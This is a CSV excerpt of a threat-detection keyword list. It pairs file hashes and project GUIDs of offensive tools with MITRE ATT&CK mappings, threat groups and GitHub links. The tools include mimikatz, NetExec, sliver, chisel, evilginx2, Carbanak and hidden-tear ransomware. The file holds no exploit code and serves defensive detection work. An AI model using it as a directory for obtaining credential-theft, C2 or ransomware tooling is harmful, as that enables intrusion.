"*28d2ed9659825ef2b0d27409423ead074c9fb88f28b2186a79bf0f849beee0f1*",".{0,1000}28d2ed9659825ef2b0d27409423ead074c9fb88f28b2186a79bf0f849beee0f1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23648"
"*28d6f30edd65e655cdc9b541b7cf46daa199b4bd1557b42f520119ef4c6a481f*",".{0,1000}28d6f30edd65e655cdc9b541b7cf46daa199b4bd1557b42f520119ef4c6a481f.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","23649"
"*28dd3615a9603eb17b828c09dbc2d7eb66ff096389c76b383076bda48ee146b2*",".{0,1000}28dd3615a9603eb17b828c09dbc2d7eb66ff096389c76b383076bda48ee146b2.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","23651"
"*28e899105aafa4f17c8a0d81d2f6664926afe59ff8c35e076ba2976291521300*",".{0,1000}28e899105aafa4f17c8a0d81d2f6664926afe59ff8c35e076ba2976291521300.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23652"
"*28e899105aafa4f17c8a0d81d2f6664926afe59ff8c35e076ba2976291521300*",".{0,1000}28e899105aafa4f17c8a0d81d2f6664926afe59ff8c35e076ba2976291521300.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23653"
"*28e90498456b5e0866fde4371f560e5673f75e761855b73b063eadaef39834d2*",".{0,1000}28e90498456b5e0866fde4371f560e5673f75e761855b73b063eadaef39834d2.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","#filehash","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","23654"
"*28f3463d7e6c3c5cc339f624712cee8e8277fffc2c6a4bf356cd4cb59ab4efce*",".{0,1000}28f3463d7e6c3c5cc339f624712cee8e8277fffc2c6a4bf356cd4cb59ab4efce.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","23655"
"*28F9E001-67E0-4200-B120-3021596689E9*",".{0,1000}28F9E001\-67E0\-4200\-B120\-3021596689E9.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","23657"
"*2900497db81e411f0eca52c308b18a7753eb6a7609e702af310773383dc0a1b0*",".{0,1000}2900497db81e411f0eca52c308b18a7753eb6a7609e702af310773383dc0a1b0.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","23658"
"*290083a0a3dac6b3c05ab3e01fb5cdfb128c0175914f1fe64cdb1a5e247d43f0*",".{0,1000}290083a0a3dac6b3c05ab3e01fb5cdfb128c0175914f1fe64cdb1a5e247d43f0.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/cube0x0/CVE-2021-1675","1","0","#filehash","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","23659"
"*29021B28-61F9-492D-BB51-7CA8889087E5*",".{0,1000}29021B28\-61F9\-492D\-BB51\-7CA8889087E5.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#GUIDProject","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","23660"
"*29036ee321d9b71ca990840cc14527ea83a24b968d0443b155a18c388f667244*",".{0,1000}29036ee321d9b71ca990840cc14527ea83a24b968d0443b155a18c388f667244.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23661"
"*290aadd32b485a7b190c623da4cf6069e25cb58a0e86231443cea3fde5082532*",".{0,1000}290aadd32b485a7b190c623da4cf6069e25cb58a0e86231443cea3fde5082532.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23663"
"*290d030d8061bad86860efb7b4ae29b7a9359cfb8b33fc8e5cdb3fad3c645f8e*",".{0,1000}290d030d8061bad86860efb7b4ae29b7a9359cfb8b33fc8e5cdb3fad3c645f8e.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","23664"
"*29130af313a863e17612085d8ffefd98e2002d989757283656d870202cd18847*",".{0,1000}29130af313a863e17612085d8ffefd98e2002d989757283656d870202cd18847.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","23665"
"*291489426e1f243b020216a872a8a1dd7d4aef1f44e352fa4b797db496f3701a*",".{0,1000}291489426e1f243b020216a872a8a1dd7d4aef1f44e352fa4b797db496f3701a.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","23666"
"*29169875afabc27c2b4184d94689aae0955a6d8a7d11788fa3337efd807077ba*",".{0,1000}29169875afabc27c2b4184d94689aae0955a6d8a7d11788fa3337efd807077ba.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","#filehash","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","23667"
"*291a6968a3f7f2092c656d0275c604182d6f7ee7b813460aeb8b28c06d804b5e*",".{0,1000}291a6968a3f7f2092c656d0275c604182d6f7ee7b813460aeb8b28c06d804b5e.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","23668"
"*291cf10eee25d10b0ddaddfb68b643dab252c1466fa4e813bb753b19b6604ef1*",".{0,1000}291cf10eee25d10b0ddaddfb68b643dab252c1466fa4e813bb753b19b6604ef1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23669"
"*291e64d8729dd0c25a58e3ed6b377e519c3cdbfa962ee88b15f950e1449363f5*",".{0,1000}291e64d8729dd0c25a58e3ed6b377e519c3cdbfa962ee88b15f950e1449363f5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23670"
"*2920df6a2de4e198af944c9536c96ebc8e8289bb48792fe52e1d5de1747b41d3*",".{0,1000}2920df6a2de4e198af944c9536c96ebc8e8289bb48792fe52e1d5de1747b41d3.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","23672"
"*292a7cd013a3291a7d1b0004c6da3ce863dcca353f77935b385e97649eac39d4*",".{0,1000}292a7cd013a3291a7d1b0004c6da3ce863dcca353f77935b385e97649eac39d4.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","23674"
"*292ac9fa8bee24377c4576b233b8d56afabe4a667aa7f08432419fef0114ea9c*",".{0,1000}292ac9fa8bee24377c4576b233b8d56afabe4a667aa7f08432419fef0114ea9c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23675"
"*293425d211b70219ee0ca753b3fcd56b44c369db44d9a7509614d31505b7e0e4*",".{0,1000}293425d211b70219ee0ca753b3fcd56b44c369db44d9a7509614d31505b7e0e4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23676"
"*29390239-C06E-4F26-B5A3-594A08D8D30C*",".{0,1000}29390239\-C06E\-4F26\-B5A3\-594A08D8D30C.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","23678"
"*293ad8aff285084f5430efae637fae32ae46e0e72f4a2a80bcfe7da35628cfd7*",".{0,1000}293ad8aff285084f5430efae637fae32ae46e0e72f4a2a80bcfe7da35628cfd7.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23680"
"*29446C11-A1A5-47F6-B418-0D699C6C3339*",".{0,1000}29446C11\-A1A5\-47F6\-B418\-0D699C6C3339.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","#GUIDproject","N/A","10","10","136","37","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z","23681"
"*2944dbfc-8a1e-4759-a8a2-e4568950601d*",".{0,1000}2944dbfc\-8a1e\-4759\-a8a2\-e4568950601d.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","0","#GUIDproject","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","23682"
"*29487e77a2dfcc7b58d901ed412c86d7b99569f640dc3b8a81a611bbf8f7c1d3*",".{0,1000}29487e77a2dfcc7b58d901ed412c86d7b99569f640dc3b8a81a611bbf8f7c1d3.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","23683"
"*2949af17b0dd766d99667bcc09646f484583cd7dcc0216fd626b517b47a91a73*",".{0,1000}2949af17b0dd766d99667bcc09646f484583cd7dcc0216fd626b517b47a91a73.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","23684"
"*2951bc5d8e2a90fef2f61add1dd98aa688862958edc8501acab5dd0782a52171*",".{0,1000}2951bc5d8e2a90fef2f61add1dd98aa688862958edc8501acab5dd0782a52171.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23685"
"*2952a3dbebc375e94bafc4a6fcfa3ccfa8993525779bb29b26684e21bcebd7c3*",".{0,1000}2952a3dbebc375e94bafc4a6fcfa3ccfa8993525779bb29b26684e21bcebd7c3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23686"
"*295850b32709c33d6cf6719301a9a26b29294f6edda200320e6869ff660915ba*",".{0,1000}295850b32709c33d6cf6719301a9a26b29294f6edda200320e6869ff660915ba.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23688"
"*295eb7f2a9039a3ef9552eda6ddeb1d442810621de623fd08a010514fe588d35*",".{0,1000}295eb7f2a9039a3ef9552eda6ddeb1d442810621de623fd08a010514fe588d35.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23689"
"*29601a1a4939f36c5d6995124862ce5c3c7e2a64b230fd9f1c04f0f52558b5ad*",".{0,1000}29601a1a4939f36c5d6995124862ce5c3c7e2a64b230fd9f1c04f0f52558b5ad.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23690"
"*296176cf45851a6671437cced0cbfaf3aadf9c5d717ea973f911928a36a78442*",".{0,1000}296176cf45851a6671437cced0cbfaf3aadf9c5d717ea973f911928a36a78442.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","23691"
"*2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA*",".{0,1000}2963C954\-7B1E\-47F5\-B4FA\-2FC1F0D56AEA.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","#GUIDproject","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","23692"
"*2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA*",".{0,1000}2963C954\-7B1E\-47F5\-B4FA\-2FC1F0D56AEA.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","#GUIDproject","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","23693"
"*296de887d687f4c1146c57e9157c343f9f8ddccfc79f8f5033f0a57d443e0ad7*",".{0,1000}296de887d687f4c1146c57e9157c343f9f8ddccfc79f8f5033f0a57d443e0ad7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23694"
"*298047e6ce299b73ea411a8ed2d67484db6c8c276a299403e0b9766cc9079456*",".{0,1000}298047e6ce299b73ea411a8ed2d67484db6c8c276a299403e0b9766cc9079456.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","23696"
"*29870f133ff5c55180d76548434106644092b56c1de103b909035c1ebbd3ab83*",".{0,1000}29870f133ff5c55180d76548434106644092b56c1de103b909035c1ebbd3ab83.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23697"
"*298b911716e8e00db371d0ba90a51b1e887ab4edafe2e998d73964ce1f85ace6*",".{0,1000}298b911716e8e00db371d0ba90a51b1e887ab4edafe2e998d73964ce1f85ace6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23698"
"*2990d1f4243fdfc99c3da1be020ee516ef530be55e2769d2526e4672e32b40f5*",".{0,1000}2990d1f4243fdfc99c3da1be020ee516ef530be55e2769d2526e4672e32b40f5.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","#filehash","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","23700"
"*29955ba1e2193047ee5f4561445f81e218ae4de1a295f8fd296ad536bf381f17*",".{0,1000}29955ba1e2193047ee5f4561445f81e218ae4de1a295f8fd296ad536bf381f17.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","23701"
"*299a1d70cfed99dc99e32c2b930207c539886f8277794f7b25edbc8ecba0930e*",".{0,1000}299a1d70cfed99dc99e32c2b930207c539886f8277794f7b25edbc8ecba0930e.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23702"
